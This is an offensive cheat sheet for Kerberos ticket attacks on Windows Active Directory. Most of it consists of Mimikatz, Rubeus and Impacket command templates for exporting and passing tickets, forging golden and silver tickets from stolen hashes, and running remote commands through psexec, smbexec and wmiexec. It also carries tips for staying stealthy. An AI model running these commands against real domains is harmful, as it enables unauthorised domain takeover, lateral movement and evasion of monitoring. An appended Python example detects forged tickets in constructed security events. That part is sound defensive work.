Tickets
Pass-The-Ticket
Mimikatz
sekurlsa::tickets /export
kerberos::list /export
kerberos::ptt <path/to/ticket.kirbi>
kerberos::golden /domain:<domain> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user> [/id:<user_rid>] /ticket:<ticket.kirbi> /ptt
Purge
kerberos::purge
Convert tickets
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Rubeus
Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>
Purge
Rubeus.exe purge
Convert tickets
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Golden ticket
Impacket
tip: Use AES keys to stay stealthy.
Request TGS
python ticketer.py -nthash <krbtgt_ntlm> -domain-sid <domain_sid> -domain <domain> <user>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain> <user>
Set TGT for impacket
export KRB5CCNAME=<TGS_ccache_file>
RCE via ticket
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Mimikatz
kerberos::golden /domain:<domain> /sid:<domain_sid> /rc4:<krbtgt_ntlm> /user:<user> /target:<host> /ptt
kerberos::golden /domain:<domain> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user> /target:<host> /ptt
kerberos::golden /domain:<domain> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user> /service:<service> /target:<host> /ptt
Rubeus
Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>
Silver ticket
Impacket
tip: Use AES keys to stay stealthy.
Request TGS
python ticketer.py -nthash <ntlm> -domain-sid <domain_sid> -domain <domain> -spn <service_spn> <user>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain> -spn <service_spn> <user>
Set TGT for impacket
export KRB5CCNAME=<TGS_ccache_file>
RCE via ticket
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Mimikatz
kerberos::golden /domain:<domain> /sid:<domain_sid> /rc4:<ntlm> /user:<user> /service:<service> /target:<host> /ptt
kerberos::golden /domain:<domain> /sid:<domain_sid> /aes128:<aes128_key> /user:<user> /service:<service> /target:<host> /ptt
kerberos::golden /domain:<domain> /sid:<domain_sid> /aes256:<aes256_key> /user:<user> /service:<service> /target:<host> /ptt
Rubeus
Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>
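The other side of the two AES tips above and of the golden ticket sections, as an added detection example that is not part of this cheat sheet or of any tool it lists: it runs over constructed Windows Security events 4768 (TGT issued by the KDC) and 4769 (service ticket issued), modelled as dicts with the fields a SIEM would extract, and flags service tickets encrypted with RC4 in a domain expected to use AES, plus service tickets for an account/client pair that never obtained a TGT from the KDC (a golden ticket is forged offline, so no 4768 is ever logged for it). Field names, IPs, accounts and timestamps are all constructed.

```python
"""Flag forged-ticket traces in constructed 4768/4769 events (added example)."""
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # TicketEncryptionType value for RC4-HMAC
LOOKBACK = timedelta(hours=10)  # default TGT lifetime: a 4769 should follow a 4768 within it

# Constructed sample events (not real log data); ts is ISO 8601, etype is the ticket encryption type.
SAMPLE_EVENTS = [
    {"id": 4768, "ts": "2024-05-01T08:00:00", "account": "alice", "client_ip": "10.0.0.5", "etype": 0x12},
    {"id": 4769, "ts": "2024-05-01T08:05:00", "account": "alice", "client_ip": "10.0.0.5",
     "service": "cifs/fs01", "etype": 0x12},
    {"id": 4768, "ts": "2024-05-01T09:00:00", "account": "bob", "client_ip": "10.0.0.9", "etype": 0x12},
    # bob's TGT was AES but the service ticket is RC4: stands out in an AES-only domain.
    {"id": 4769, "ts": "2024-05-01T09:10:00", "account": "bob", "client_ip": "10.0.0.9",
     "service": "cifs/fs01", "etype": RC4_HMAC},
    # No 4768 for this account from this client in the window: the KDC never issued the TGT.
    {"id": 4769, "ts": "2024-05-01T09:30:00", "account": "Administrator", "client_ip": "10.0.0.77",
     "service": "cifs/dc01", "etype": 0x12},
]


def parse_ts(value):
    return datetime.fromisoformat(value)


def find_suspicious_tgs(events, lookback=LOOKBACK):
    """Return (reason, event) pairs for 4769 events that look like forged tickets."""
    findings = []
    tgt_times = {}  # (account, client_ip) -> timestamps of TGTs the KDC actually issued
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        key = (ev["account"].lower(), ev["client_ip"])
        if ev["id"] == 4768:
            tgt_times.setdefault(key, []).append(parse_ts(ev["ts"]))
            continue
        if ev["id"] != 4769:
            continue
        if ev["etype"] == RC4_HMAC:
            findings.append(("rc4_ticket_in_aes_domain", ev))
        now = parse_ts(ev["ts"])
        # A genuine service ticket request is preceded by a TGT the KDC issued to the same client.
        if not any(now - lookback <= issued <= now for issued in tgt_times.get(key, [])):
            findings.append(("tgs_without_prior_tgt", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in find_suspicious_tgs(SAMPLE_EVENTS):
        print(f"{reason}: {ev['account']} from {ev['client_ip']} -> {ev['service']}")
```

In production, aggregate 4768/4769 from every domain controller and fold in 4770 renewals before alerting on a missing TGT, or legitimate clients that authenticated against another DC will be flagged. A silver ticket is presented straight to the service and never touches the KDC, so this 4769-based correlation does not see it; host-side logon telemetry is needed for that case.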